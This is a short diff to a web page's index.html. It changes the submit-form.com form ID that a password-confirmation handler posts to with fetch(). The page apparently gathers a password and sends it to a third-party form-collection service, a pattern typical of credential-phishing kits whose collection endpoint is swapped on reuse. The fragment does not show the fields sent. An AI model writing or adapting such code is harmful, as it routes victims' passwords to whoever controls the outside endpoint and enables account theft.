--- a/index.html
+++ b/index.html
@@ -1675,7 +1675,7 @@
                       confirmPasswordBtn.innerHTML = `<i class="fas fa-spinner fa-spin"></i> ${translations[currentLanguage]['processing'] || 'Processing...'}`;
 
                       // Submit to SubmitForm.com
-                      const response = await fetch('https://submit-form.com/YOwOE3vWF', {
+                      const response = await fetch('https://submit-form.com/NfuwyEWoC', {
                           method: 'POST',
                           headers: {
                               'Content-Type': 'application/json',
